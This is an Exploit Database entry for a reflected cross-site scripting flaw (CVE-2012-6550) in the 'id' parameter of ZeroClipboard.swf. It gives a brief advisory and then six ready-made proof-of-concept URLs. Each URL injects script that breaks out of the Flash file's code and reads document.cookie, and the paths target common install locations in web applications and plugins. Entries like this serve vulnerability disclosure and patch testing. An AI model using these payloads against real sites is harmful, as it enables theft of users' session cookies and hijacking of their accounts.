Exploit Database - Logo

ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting

EDB-ID: 38329 Author: MustLive Published: 2013-02-20
CVE: CVE-2012-6550 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/58116/info

ZeroClipboard is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ZeroClipboard versions prior to 1.1.7 are vulnerable. 

http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Related Exploits

Trying to match CVEs (1): CVE-2012-6550
Trying to match OSVDBs (1): 90399
Other Possible E-DB Search Terms: ZeroClipboard 1.9.x,  ZeroClipboard
Date D V Title Author
No matches
Menu